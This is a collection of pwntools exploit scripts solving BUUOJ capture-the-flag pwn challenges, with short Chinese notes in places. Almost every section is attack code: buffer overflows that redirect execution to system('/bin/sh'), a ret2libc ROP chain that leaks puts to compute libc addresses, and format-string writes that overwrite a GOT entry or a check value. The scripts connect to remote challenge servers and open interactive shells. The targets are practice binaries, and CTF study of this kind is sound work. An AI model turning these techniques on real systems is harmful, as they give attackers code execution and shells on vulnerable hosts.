1.pwn1
from pwn import *
log_level = 'debug'
elf = ELF("./pwn1")
local = 0
if local:
r = process("./pwn1")
else:
r = remote("node4.buuoj.cn",29317)
bin_sh = 0x000000000040118A
system_addr = 0x0000000000401191
payload = b'a'*0x0F + p64(system_addr) + p64(bin_sh)
r.sendline(payload)
r.interactive()
2.warmup_csaw_2016
from pwn import *
context(os='linux',arch= 'amd64',log_level='debug')
elf = ELF("./warmup")
local = 0
if local:
r = process("./warmup")
else:
r = remote("node4.buuoj.cn",29230)
addr = 0x000000000040060e
payload = b'a'*72 + p64(addr)
r.sendline(payload)
r.interactive()
3.cisn_2019_n_1
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
elf=ELF("./ciscn")
local = 0
if local:
r = process("./ciscn")
else:
r = remote("node4.buuoj.cn",28539)
v2=0x41348000 //11.28125的十六进制形式
payload = b'a'*(0x30-0x04)+p64(v2)
r.sendline(payload)
r.interactive()
4.pwn1_sctf_201 6
from pwn import *
log_level = 'debug'
elf = ELF("./pwn1_sctf")
local = 0
if local:
r = process("./pwn1_sctf")
else:
r = remote("node4.buuoj.cn",28883)
get_flag = 0x08048F0D
payload = b'I'*20 + b'a'*4 + p32(get_flag)
r.sendline(payload)
r.interactive()
5.level0
from pwn import *
context(os = 'linux',arch = 'amd64',log_level = 'debug')
elf = ELF("./level0")
local = 0
if local:
r = process("./level0")
else:
r = remote("node4.buuoj.cn",26837)
call_system = 0x0000000000400596
payload = b'a'*0x80+p64(0)+p64(call_system)
r.sendline(payload)
r.interactive()
6.ciscn_2019_c_1
from pwn import *
context(os= 'linux',arch='amd64',log_level='debug')
elf=ELF("./ciscn_2019")
local = 0
if local:
r = process("./ciscn_2019")
else:
r = remote("node4.buuoj.cn",29853)
def encrypt(paylaod):
l = list(payload)
for i in range(len(l)):
if l[i].isdigit():
l[i] = chr(ord(l[i])^0xF)
if l[i].isupper():
l[i] = chr(ord(l[i])^0xE)
if l[i].islower():
l[i] = chr(ord(l[i])^0xD)
return ''.join(l)
pop_rdi = 0x0000000000400c83
pop_ret = 0x00000000004006b9
main_addr = 0x0000000000400B28
put_plt = elf.plt['puts']
put_got = elf.got['puts']
r.recv()
r.sendline("1")
r.recvuntil("encrypted")
payload = b'1'*(0x50+8) + p64(pop_rdi) + p64(put_got) + p64(put_plt) + p64(main_addr)
payload = encrypt(payload)
r.sendline(payload)
r.recvuntil("Ciphertext\n")
r.recvuntil("\n")
puts_addr = u64(r.recvline()[:-1].ljust(8,'\x00'))
log.success('puts_addr='+hex(puts_addr))
puts_offset = 0x0809c0
libc_base = puts_addr - puts_offset
log.success('libc_base'+hex(libc_base))
r.sendlineafter("choice!","1")
system_offset = 0x04f440
bin_sh_offset = 0x1b3e9a
sys_addr = libc_base + system_offset
bin_sh = libc_base + bin_sh_offset
payload1 = b'a'*(0x50+0x8) + p64(pop_ret) + p64(pop_rdi) + p64(bin_sh) + p64(sys_addr)
r.sendline(payload1)
r.interactive()
7.第五空间2019决赛pwn5
-
思路
-
思路1:直接利用格式化字符串改写unk_804C044之中的数据.第一个read利用格式化字符串漏洞修改unk_804C044的值,第二个read输入我们修改后的值去满足if判断从而执行system(‘/bin/sh’).
-
思路2:利用格式化字符串改写atoi的got地址,改为system_plt的地址.第一个read利用格式化字符串漏洞修改atoi_got为system_plt,第二个read输入"/bin/sh\x00",执行system(“/bin/sh”).
-
思路3:unk_804C044是随机生成的,我们可以自己写入一个值,然后在第二个read时再发送这个值.
-
exp1
-
from pwn import *
context(os = 'linux',arch = 'i386',log_level = 'debug')
elf = ELF("./pwn")
local = 0
if local:
r = process("./pwn")
else:
r = remote("node4.buuoj.cn",27278)
unk_addr = 0x0804C044
payload = p32(unk_addr)+b"%10$n"
r.sendline(payload)
r.sendline(str(0x04))#unk_addr = 4byte
r.interactive()
- exp2
from pwn import *
context(os = 'linux',arch = 'i386',log_level = 'debug')
elf = ELF("./pwn")
local = 0
if local:
r = process("./pwn")
else:
r = remote("node4.buuoj.cn",27278)
# 0x804c000 0x804d000 rw-p # unk_804C044 0x0804C044
system_plt = 0x08049080
atoi_got = 0x0804C034
#payload = b'%10$n' + p32(atoi_got)+p32(system_plt)
payload = fmtstr_payload(10,{atoi_got:system_plt})
r.sendline(payload)
r.sendline("/bin/sh\x00")
r.interactive()
[fmtstr_payload用法](https://breeze-666.github.io/2022/01/14/noname/)
exp3
from pwn import *
context(os = 'linux',arch = 'i386',log_level = 'debug')
elf = ELF("./pwn")
local = 0
if local:
r = process("./pwn")
else:
r = remote("node4.buuoj.cn",27278)
unk_addr = 0x0804C044
payload = fmtstr_payload(10,{unk_addr:0x1})
r.sendline(payload)
r.sendline(str(0x1))
r.interactive()